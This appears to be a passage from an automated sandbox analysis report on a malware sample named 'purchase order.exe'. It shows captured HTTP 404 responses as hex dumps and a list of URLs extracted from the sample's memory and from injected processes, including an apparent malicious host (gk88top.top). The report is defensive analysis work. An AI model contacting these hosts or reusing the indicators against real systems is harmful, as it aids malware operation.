74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:44 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 06 Dec 2024 08:34:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 06 Dec 2024 08:34:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 06 Dec 2024 08:34:14 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:34:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmOCNn8sTefxI4Gfk%2BRHsnYOaHFyC557m1c7u5N6D0itD91%2FuH0v7%2Bm%2BtsvNRCkDqFrxPmAxHCSUZknzxeIjJcoLZch4y1oGj8JNZdBacAUhgZ5Hdox3b%2Fd%2FLRrNbCvuQ5U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edaefc6f8d6434a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:34:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbI1T69%2F7I8Np3e3TU33p0QgYCVGOYcLkBtlm3w5vKavK46mwtWkd664WccANxvBdY%2B3kVVGjWRlZQlaWvtbotMeVvxMTmThaCrqbgIj8OaEwYeUQ2A419yq3I%2BENpqdOBk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edaefe85a668c60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=408&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
                Source: cacls.exe, 00000007.00000002.3518525848.0000000003B3C000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000007.00000002.3517787544.0000000003196000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434717461.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2663319819.0000000023FAC000.00000004.80000000.00040000.00000000.sdmp, purchase order.exeString found in binary or memory: http://localhost/calculator_server/requests.php
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: olMGHvjsNFhNU.exe, 00000008.00000002.3517718165.0000000000FE5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gk88top.top
                Source: olMGHvjsNFhNU.exe, 00000008.00000002.3517718165.0000000000FE5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gk88top.top/4gxa/
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
